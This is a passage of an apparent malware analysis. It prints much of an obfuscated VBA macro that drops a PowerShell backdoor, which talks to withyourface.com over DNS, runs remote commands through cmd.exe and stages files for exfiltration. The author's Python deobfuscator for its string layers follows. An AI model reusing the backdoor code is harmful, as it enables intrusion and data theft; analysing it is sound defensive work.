SGFdata += SGFrs[1][SGFi]; } }" & vbCrLf & " if (SGFrs'+'[0][0] -eq X9PNX9P)" & vbCrLf & " {" & vbCrLf
sss = sss + " SGFZZD = X9PWX9P;" & vbCrLf & " SGFBBE++;" & vbCrLf & " continu'+'e;" & vbCrLf & " '+' }" & vbCrLf & " if (SGFrs[0] -eq X9PS000sX9P)" & vbCrLf & " {" & vbCrLf & " SGFBBE = 0;" & vbCrLf & " '+' SGFZZD = X9PDX9P;" & vbCrLf & " SGFAAE'+' += (X9PrcvdX9P+SGFdata);" & vbCrLf & " SGFct = 0;" & vbCrLf & " continue;" & vbCrLf & " }" & vbCrLf & " if (SGFrs['+'0][0] '+'-eq ZxVSZxV -'+'and -not'+' (SGFfb'+' -contains SGFrs[0]))" & vbCrLf & " '+' {'+'" & vbCrLf & " SGFZZD = X9PDX9P;" & vbCrLf & " if (SGFrs[0].EndsWith(SGFrn))" & vbCrLf & " {" & vbCrLf & " t'+'ry" & vbCrLf & " {" & vbCrLf & " '+' SGFtmp = SGFdata.Replace(ZxV-ZxV, ZxV+ZxV).Replace(ZxV_'+'ZxV, ZxV/ZxV);" & vbCrLf & " '+' SGFbyts += [System.Convert]::FromBase64String(SGFtmp);" & vbCrLf & " SGFct++;" & vbCrLf & " SGF'+'fb'+' += SGFrs[0];" & vbCrLf & " }" & vbCrLf & " catch" & vbCrLf & " {" & vbCrLf & " Write-Host X9PException in receiver_X9P+SGF'+'_;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf
sss = sss + " if (SGFrs[0].StartsWith(X9PEX9P))" & vbCrLf & " {" & vbCrLf & " [System.IO'+'.File]::WriteA'+'llBytes(SGFAAE, SGFbyts);" & vbCrLf & " break;" & vbCrLf & " }" & vbCrLf & " if (SGFrs[0].StartsWith(X9PCX9P))" & vbCrLf & " {" & vbCrLf & " SGFct = 0; SGFrun = SGFf'+'alse;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "function DDE(SGFEEE)" & vbCrLf & "{" & vbCrLf & " SGFLLD = 0;" & vbCrLf & " SGFFFE = @(gci -path (SGF{global:SGFGGE}+X9PMxaproc*X9'+'P) 7rn ? { !SGF_.PSIsContainer });" & vbCrLf & " if (SGFFFE -ne SGFnull)" & vbCrLf & " {" & vbCrLf & " " & vbCrLf & " SGFHHE ='+' SGFFFE[0].ToString().'+'Substring(SGFFFE[0'+'].ToStrin'+'g().L'+'e'+'ngth - 5)" & vbCrLf & " SGFIIE = SGF'+'{gl'+'obal:SGFGGE} + X9PMxaX9P + SGFHHE;'+'" & vbCrLf & " rni SGFFFE[0] S'+'GFIIE -'+'Force" & vbCrLf & " SGFJJE = slaber'+' SGFIIE;" & vbCrLf & " if ([int]SGFJ'+'JE.Length -le 0) { rd -path SGFIIE;return; }" & vbCrLf & " SGFKKE = 60;" & vbCrLf
sss = sss + " SGFLLE = X9P*X9P * 54;" & vbCrLf & " SGFLLE = Split-path SGFIIE -Leaf 7rn % { SGFLLE.Insert(0, SGF_) } 7rn %'+' { SGF_.Insert(6, SGFJJE.Length) } 7rn'+' '+'%{ SGF_[0 .. 26] -join X9PX9P };" & vbCrLf & " SGFLLE = -join (SGFLLE 7rn % { resolver S'+'GF_ })" & vbCrLf & " SGFMME = X9PCOCTabX9P + SGFLLE;" & vbCrLf & " SGFJJE = SGFMME + SGFJJE;" & vbCrLf & " '+'SGFNNE = X9P000X9P;" & vbCrLf & " SGFQQD = X9P2X9P;" & vbCrLf & " SGFOOE = 0;" & vbCrLf & "'+'" & vbCrLf & " SGFPPE = SGFtrue;" & vbCrLf & " SGF{global:SGFRRD} '+'= SGFtrue;" & vbCrLf & " SGFQQE = SGFtrue;" & vbCrLf & " SGF{global:SGFSSD} = 0;" & vbCrLf & " '+' SGF'+'{global:SGFTTD} = 5;" & vbCrLf & " " & vbCrLf & " While (SGF{global'+':SGFRRD})" & vbCrLf & " {" & vbCrLf & " Start-Sleep -m 10;" & vbCrLf & " if (SGF{global:SGFSSD} -gt SGF{global:SGFTT'+'D})" & vbCrLf & " {" & vbCrLf & " SGFRRE = SGF{gl'+'obal:SGFGGE} + X9PMxaprocX'+'9P + SGFHHE;'+'" & vbCrLf & " '+' rni SGFIIE SGFRRE -Force;" & vbCrLf
sss = sss + " break;" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & "'+' if (SGFLLD -lt 10) { SGFNNE = X9P00SGF(SGFLLD)X9P; }" & vbCrLf & " elseif (SGFLLD -lt 100) { SGFNNE = X9P0SGF(SGFLLD)X9P; }" & vbCrLf & " else { SGFNNE = X9PSGF(SGFLL'+'D)X9P; }" & vbCrLf & " " & vbCrLf & " if (SGFL'+'LD -eq 250)" & vbCrLf & " {" & vbCrLf & " if (SGFPPE)" & vbCrLf & " {" & vbCrLf & " SGFOOE += 250;" & vbCrLf & " }" & vbCrLf & " SGFLLD = 0; SGFPPE = SGFfalse;" & vbCrLf & " }" & vbCrLf & " if (SGFLLD -eq 200) { SGFPPE = SGFtrue; }" & vbCrLf & " " & vbCrLf & " if (SGFJJE.Length -gt SGFKKE)" & vbCrLf & " {" & vbCrLf & " if ((SGFJJE.L'+'ength - SGFKKE * (SGFLLD + SGFOOE)) -ge SG'+'FKKE)" & vbCrLf & " {" & vbCrLf & " SGFSSE = SG'+'FJJE.Substring(SGFKKE * (SGFLLD + SGFOOE), SGFKKE);" & vbCrLf & " }" & vbCrLf & " elseif ((SGFJJE.Len'+'gth - SGFKKE * (SGFLLD + SGFOOE)) -gt 0)" & vbCrLf & " {" & vbCrLf
sss = sss + "SGFSSE = SGFJJE.Substring(SGFKKE * (SGFLLD + SGFOOE), (SGFJJE.Length - SGFKKE * (SGFLLD + SGFOOE)));" & vbCrLf & " }" & vbCrLf & " els'+'e" & vbCrLf & " {" & vbCrLf & " SGFSSE = X9PCOCTabCOCTX9P;" & vbCrLf & " SGF'+'{global:SGFRRD} = SGFfalse;" & vbCrLf & "'+' '+' rd -path SGFIIE -Force;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " else" & vbCrLf & " {" & vbCrLf & " SGFSSE = SGFJJE;" & vbCrLf & " '+' }" & vbCrLf & " SGFTTE = (Split-path SGFIIE '+'-Leaf) + X9P*X9P 7rn % { resolver SGF_ };" & vbCrLf & " SGFUUD = UUC SGFNNE SGFQQD SGFSSE SGFTTE X9PsX9P X9P0000X9P" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " if (SG'+'FEEE -lt 3 -and -not (SGFUUE))" & vbCrLf & " {" & vbCrLf & " '+' '+' SGFVVD = IID('+'SG'+'FUUD);" & vbCrLf & " }" & vbCrLf & " '+'else" & vbCrLf & " {" & vbCrLf & " SGFVVD = [System.Net.Dns]::GetHostAddresses(SGFUUD);" & vbCrLf & " SGFVVD = SGFVVD.I'+'PAddr'+'essToString.Split(ZxV.ZxV)" & vbCrLf & " }" & vbCrLf & " Write-Host SGFVVD;" & vbCrLf
sss = sss + " }'+'" & vbCrLf & " catch [exception] { Wr'+'ite-Host X9Pexcepton occured!X9P+SGF_; SGF{global:SGFSSD}++; continue; }" & vbCrLf & " " & vbCrLf & " if (SG'+'FVVD -eq SGFnull) { SGFQQE = SGFfalse; SGF{globa'+'l:SGFSSD}++; continue }" & vbCrLf & " '+'if ((SGFVVD[0] -eq SGFRRC.Substring(0,2)) -and (SGFVVD[1] '+'-eq 2) -and (SGFVVD[2] -eq 3))" & vbCrLf & " {" & vbCrLf & " SGFQQE = SGFfalse;'+'" & vbCrLf & " SGFLLD = [int]SGFVVD[3];" & vbCrLf & " }" & vbCrLf & "'+'" & vbCrLf & " " & vbCrLf & " if ((SGFVVD[0] -eq '+'253) -and (SGFVVD[1] -eq 25) -and (SGFVVD[2] -eq 42) -and (SGFVVD[3] -eq 87)) # kill this process" & vbCrLf & " {" & vbCrLf & " SGFQQE = SGFfalse;" & vbCrLf & " SGFOOE = 0" & vbCrLf & " SGF{global:SGFRRD} = SGFfalse;" & vbCrLf & " SGF{global:SGFSSD} = SGF{global:SGFSSD} + 3;" & vbCrLf & " del SGFIIE;" & vbCrLf & " }" & vbCrLf & " " & vbCrLf & " if (SGFQQE)" & vbCrLf & " {" & vbCrLf & "'+'" & vbCrLf & " SGF{global:SGFSSD}++;" & vbCrLf
sss = sss + " }" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "function slab'+'er (SGFVVE) {" & vbCrLf & " SGFf = gc SGFVVE -Encoding Byte;" & vbCrLf & " SGFe = resolver(SGFf);" & vbCrLf & " retur'+'n SGFe;" & vbCrLf & "}" & vbCrLf & "function resolver (SGFWWE) {" & vbCrLf & " SGFcnt = 0;" & vbCrLf & " SGFp1 = X9PX9P;" & vbCrLf & " SGFp2'+' = X9PX9P;" & vbCrLf & " for (SGFi = 0; SGFi -lt SGFWWE.Length; SGFi++)" & vbCrLf & " {" & vbCrLf & " if (SGFcnt -eq 30)" & vbCrLf & " {" & vbCrLf & " SGFcnt = 0;" & vbCrLf & " SGFres += (SGFp1 + SGFp2);" & vbCrLf & " SGF'+'p1 = X9PX9P; SGFp2 = X9PX9P;" & vbCrLf & " }" & vbCrLf & " SGFtmp = [System.BitConverter]::ToString(SGFWWE[SGFi]).Replace(X9P-X9P, X9PX9P);" & vbCrLf & " SGFp1 += SG'+'Ftmp[0];" & vbCrLf & " SGFp2 += SGFtmp[1];" & vbCrLf & " SGFcnt++;" & vbCrLf & " }" & vbCrLf & " SGFres +='+' (SGFp1 + SGFp2);" & vbCrLf & " return SGFres;" & vbCrLf & "}" & vbCrLf & "function XXE" & vbCrLf & "{" & vbCrLf
sss = sss + " SGFFFE = @(gci -path (SGF{global:SGFNND}+X9PMxarcvd'+'*X9P) 7rn ? { !SGF_.PSIsContainer });" & vbCrLf & " if (SGFFFE -ne SGFnull)" & vbCrLf & " {" & vbCrLf & " S'+'GFIIE = SG'+'FFFE[0].ToStri'+'ng()'+'.Replace(X9PrcvdX9P, X9PprocX9P)" & vbCrLf & " rni SGFFFE[0] SGFIIE -Force" & vbCrLf & " '+' SGFYYE = SGFIIE'+' -replace X9PreceiveboxX9P, X9PsendboxX9P;" & vbCrLf & " i'+'f (SGFIIE.EndsWith(X9P0X9P))" & vbCrLf & " {" & vbCrLf & " SGFZZE = gc SGFIIE 7rn'+' ? { SGF_.t'+'rim() -ne X9PX9P };'+'" & vbCrLf & " S'+'GFZZE = SGFZZE 7rn ? { SGF_.trim() -ne X9PX9P }" & vbCrLf & " SGFAAF += (SGFZZE + X9P 2>&1X9P) 7rn % {Try { SGF_ 7rn cmd.exe 7rn Out-String }Catch { SGF_ 7rn Out-Strin'+'g '+'}}" & vbCrLf & " SGFAAF +X9P<>X9P 7rn sc SGFYYE -Encoding UTF8" & vbCrLf & " if (Te'+'st-path -path SGFIIE)" & vbCrLf & " {" & vbCrLf & " rd -path SG'+'FIIE;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " elseif (SGF'+'IIE.EndsWith(X9P1X9P))" & vbCrLf & " {" & vbCrLf
sss = sss + " SGFBBF = gc SGFIIE 7rn ? { SGF_.'+'trim() -ne X9PX9P } 7rn %{ SGF_.Replace(X9PVOl0X9P, X9PX9P).Trim() }" & vbCrLf & " if (Test-path -path SGFBBF)" & vbCrLf & " {" & vbCrLf & " cpi -path SGFBBF -destination SGFYYE -Force;" & vbCrLf & " }" & vbCrLf & " else" & vbCrLf & " {" & vbCrLf & " X9PFile not existX9P 7rn sc SGFYYE;" & vbCrLf & " }" & vbCrLf & " if (Test-path -path SGFIIE)" & vbCrLf & " {" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & " }" & vbCrLf & "'+'" & vbCrLf & " }" & vbCrLf & " '+'else {" & vbCrLf & " SGFCCF = SGFIIE -replac'+'e'+' X9PreceiveboxX9P, X9PdoneX9P;" & vbCrLf & " mi -path SGFIIE -destination SGFCCF'+' -Force;" & vbCrLf & " if (Test-path -path SGFCCF)" & vbCrLf & " {" & vbCrLf & " (X9P200'+'<>X9P + SGFCCF) 7rn sc SGFYYE;" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & " }" & vbCrLf & " }" & vbCrLf & " try" & vbCrLf & " {" & vbCrLf & " rd -path SGFIIE;" & vbCrLf & " }cat'+'ch{}" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf
sss = sss + "SGF{global'+':SGFDDF} = SGFNNC + X9PMxaX9P + SGFRRC;" & vbCrLf & "SGF{global:SGFEEF} = SGFN'+'NC + X9PMxafilesX9P;" & vbCrLf & "SGF{glo'+'b'+'al:SGFNND} = '+'SGF{global:S'+'GFDDF} + X9PMxareceiveboxX9P;" & vbCrLf & "S'+'GF{global:SGFGGE} = SGF{global:SGFDDF} + X9PMxasendboxX9P;" & vbCrLf & "SGF{global:SGFFFF} = SGF{global:SGFDDF} + X9PMxadoneX9P;" & vbCrLf & "'+'" & vbCrLf & "if (-not (Test-Path SGF{global:SGF'+'EEF})) { md SGF{global:SGFEEF}; }" & vbCrLf & "if (-no'+'t (Test-Path SGF{global:SGFDDF}) -or -not (Test-Path SGF{global:SGFGGE}))" & vbCrLf & "{" & vbCrLf & " md SGF{global:SGFDDF};" & vbCrLf & " md SGF{global:SGF'+'GGE};" & vbCrLf & " m'+'d SGF{global:SGFNND};" & vbCrLf & " md SGF{global:SGFFFF};" & vbCrLf & "}" & vbCrLf & "SGFGGF = UU'+'C X9P000X9P X9PMX9P X9PX9P X9PX9P X9PrX9P SGFrn" & vbCrLf & "SGFHHF = [System.Net.Dns]::GetHostAddresses(SGFGGF);" & vbCrLf & "SGFUUE = SGFfalse;" & vbCrLf & "if (SGFHHF -eq X9P99.250.250.1'+'99X9P)" & vbCrLf & "{" & vbCrLf
sss = sss + " SGF{global:SGFTTC} = 0;" & vbCrLf & " YYD;" & vbCrLf & " if (SGF{global:SG'+'FTTC} -gt 3)" & vbCrLf & " {" & vbCrLf & " SGFUUE = SGFtrue;" & vbCrLf & "'+'" & vbCrLf & " SGFIIF = UUC X9P000X'+'9P X9PPX9P X9PX'+'9P X9PX9P X9PrX9P SGFrn" & vbCrLf & " ['+'System.Net.Dns]::GetHostAddresses(SGFIIF);" & vbCrLf & " JJD;" & vbCrLf & " }" & vbCrLf & "}" & vbCrLf & "else" & vbCrLf & "{" & vbCrLf & " SGFUUE = SG'+'Ftrue;" & vbCrLf & " JJD;" & vbCrLf & "}" & vbCrLf & "XXE;" & vbCrLf & "DDE(SGF{global:'+'SGFTTC});" & vbCrLf & "# remove lock'+' file to next request" & vbCrLf & "ri -Path SGFPPC;') -CrEPLaCe'Mxa',[chAR]92 -REplace ([chAR]83+[chAR]71+[chAR]70),[chAR]36 -REplace 'X9P',[chAR]34-CrEPLaCe ([chAR]55+[chAR]114+[chAR]110),[chAR]124 -REplace'ZxV',[chAR]39 -REplace'VOl',[chAR]96) | &( $ShelliD[1]+$sHeLLId[13]+'X')"
Open "C:\ProgramData\WindowsAppPool\AppPool.ps1" For Output As #1
Print #1, sss
Close #1
End Sub
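The preview above hides its strings in two layers. Sub AAAA spells 'powershell.exe', 'cmd.exe' and 'wscript' as chains of Chr(CLng("&Hxx")), and Sub HGHG writes the PowerShell stage as a single-quoted, '+'-split string in which Mxa, SGF, X9P, 7rn, ZxV and VOl stand in for \, $, ", |, ' and ` until the trailing -creplace/-replace chain restores them and &($ShellId[1]+$ShellId[13]+'X'), i.e. ieX, evaluates the result. The following Python is an added example for this report, not code from the sample or from the analyzer: it folds the Chr() chains back into literals, evaluates the VBA concatenation the way Print #1 would, strips the wrapper and applies the six substitutions in the order the payload applies them. SAMPLE_VBA is three lines copied from the preview; the function names are mine.

```python
"""Undo the two layers of string obfuscation in the AppPool macro.

Added example for this report, not code from the sample or the analyzer.
Layer 1 (Sub AAAA): command names are Chr(CLng("&Hxx")) chains.
Layer 2 (Sub HGHG): the PowerShell stage is a '+'-split string with six placeholder
tokens that its own trailing -creplace/-replace chain turns back into punctuation.
"""
import re

# ---- layer 1: Chr(CLng("&H77")) & Chr(CLng("&H73")) ... -> "ws..." ----------------------
CHR_RE = re.compile(r'Chr\(CLng\("&H([0-9A-Fa-f]{1,2})"\)\)')
VBA_LIT = r'"(?:[^"]|"")*"'                      # a VBA string literal; "" is an escaped quote
MERGE_RE = re.compile(r'(%s)\s*&\s*(%s)' % (VBA_LIT, VBA_LIT))


def inline_chr(vba_line: str) -> str:
    """Replace each hex Chr() call with a literal, then fold "a" & "b" into "ab"."""
    out = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1), 16)).replace('"', '""') + '"', vba_line)
    prev = None
    while prev != out:                           # keep folding until no adjacent literals remain
        prev = out
        out = MERGE_RE.sub(lambda m: m.group(1)[:-1] + m.group(2)[1:], out)
    return out


# ---- layer 2a: evaluate the VBA concatenation that builds the ps1 text -------------------
VBA_TOK = re.compile(r'"((?:[^"]|"")*)"|(vbCrLf)')


def eval_vba_concat(expr: str) -> str:
    """Evaluate a VBA expression made only of string literals, vbCrLf, & and +."""
    parts = []
    for m in VBA_TOK.finditer(expr):
        if m.group(1) is not None:
            parts.append(m.group(1).replace('""', '"'))
        else:
            parts.append("\r\n")
    return "".join(parts)


def collect_ps_payload(vba_source: str) -> str:
    """Join every `sss = sss + ...` line of Sub HGHG: what Print #1, sss writes to AppPool.ps1."""
    return "".join(eval_vba_concat(line) for line in vba_source.splitlines()
                   if line.strip().startswith("sss = sss +"))


# ---- layer 2b: the payload's own trailer, in the order PowerShell applies it -------------
#   -CrEPLaCe'Mxa',[chAR]92  -REplace ([chAR]83+[chAR]71+[chAR]70),[chAR]36  -REplace 'X9P',[chAR]34
#   -CrEPLaCe ([chAR]55+[chAR]114+[chAR]110),[chAR]124  -REplace'ZxV',[chAR]39  -REplace'VOl',[chAR]96
SUBS = [                    # (token, replacement, case-sensitive?)  -creplace is the case-sensitive form
    ("Mxa", "\\", True),    # [char]92  backslash
    ("SGF", "$", False),    # [char]36  variable sigil
    ("X9P", '"', False),    # [char]34  double quote
    ("7rn", "|", True),     # [char]124 pipe
    ("ZxV", "'", False),    # [char]39  single quote
    ("VOl", "`", False),    # [char]96  backtick (PowerShell escape character)
]
WRAPPER_RE = re.compile(r"\s*\(\('(.*)'\)\s*-CrEPLaCe", re.S)


def deobfuscate_ps(blob: str) -> str:
    """Strip the (('..') -CrEPLaCe ...) wrapper, undo the '+' splitting, apply the six substitutions."""
    m = WRAPPER_RE.match(blob)
    body = m.group(1) if m else blob
    body = body.replace("'+'", "")               # 'Te'+'st-Path' -> Test-Path (single-quoted, so literal)
    for tok, rep, case_sensitive in SUBS:
        body = re.sub(re.escape(tok), lambda _m, r=rep: r, body, flags=0 if case_sensitive else re.I)
    return body


def resolve_invoker(shell_id: str = "Microsoft.PowerShell") -> str:
    """&($ShellId[1]+$ShellId[13]+'X'): $ShellId is 'Microsoft.PowerShell', so this is ieX (Invoke-Expression)."""
    return shell_id[1] + shell_id[13] + "X"


# Constructed input: three lines copied from the preview above (one from Sub AAAA, two from Sub HGHG).
SAMPLE_VBA = r'''
A = A + Chr(CLng("&H70")) & Chr(CLng("&H6F")) & Chr(CLng("&H77")) & Chr(CLng("&H65")) & Chr(CLng("&H72")) & Chr(CLng("&H73")) & Chr(CLng("&H68")) & Chr(CLng("&H65")) & Chr(CLng("&H6C")) & Chr(CLng("&H6C")) & Chr(CLng("&H2E")) & Chr(CLng("&H65")) & Chr(CLng("&H78")) & Chr(CLng("&H65"))
sss = sss + "(('SGFMMC = '+'X9Pwithyourface.comX9P;" & vbCrLf & "SGFNNC = X9PC:MxaProgramDataMxaWindowsAppPoolX9P;'+'" & vbCrLf
sss = sss + "ri -Path SGFPPC;') -CrEPLaCe'Mxa',[chAR]92 -REplace ([chAR]83+[chAR]71+[chAR]70),[chAR]36 -REplace 'X9P',[chAR]34-CrEPLaCe ([chAR]55+[chAR]114+[chAR]110),[chAR]124 -REplace'ZxV',[chAR]39 -REplace'VOl',[chAR]96) | &( $ShelliD[1]+$sHeLLId[13]+'X')"
'''


def demo() -> dict:
    """Run all three steps over SAMPLE_VBA."""
    return {
        "aaaa_line": inline_chr(SAMPLE_VBA.splitlines()[1]),
        "ps1": deobfuscate_ps(collect_ps_payload(SAMPLE_VBA)),
        "invoker": resolve_invoker(),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Run collect_ps_payload over the whole preview (all `sss = sss + ...` lines) and deobfuscate_ps over the result to get the readable AppPool.ps1; the order of the substitutions matters because the '+' joins must go before ZxV becomes a real single quote. Note that -replace is a regex operator, so re.escape is the faithful equivalent, and that the six -replace/-creplace tokens are also why the artifact triage above counted 97 "random" identifiers.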